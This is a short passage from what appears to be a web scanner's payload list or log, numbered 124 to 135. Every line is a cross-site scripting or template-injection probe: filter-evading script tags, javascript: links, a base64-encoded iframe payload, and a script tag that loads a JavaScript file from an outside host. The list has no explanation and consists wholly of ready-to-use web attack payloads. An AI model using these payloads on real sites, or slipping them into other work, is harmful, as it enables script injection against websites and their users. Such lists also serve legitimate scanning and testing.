  124. 20<ScR<ScRiPt>IpT>dNH9(9406)</sCr<ScRiPt>IpT>
  125. 1'"

126. 20<ScRiPt
    >dNH9(9030)</ScRiPt>
  127. 20<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9512></ScRiPt>
  128. 20<ScRiPt
    >dNH9(9213)</ScRiPt>
  129. 20\u003CScRiPt\dNH9(9916)\u003C/sCripT\u003E
  130. <A HreF= javascript:dNH9(9093)>
  131. 20<WDXWE1>AD2T9[!+!]</WDXWE1>
  132. {{10000344*9999484}}
  133. 20<ScRiPt >dNH9(9506)</ScRiPt>
  134. 20<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9464'>
  135. <a hREF=feed:javascript&colon;dNH9(9738)>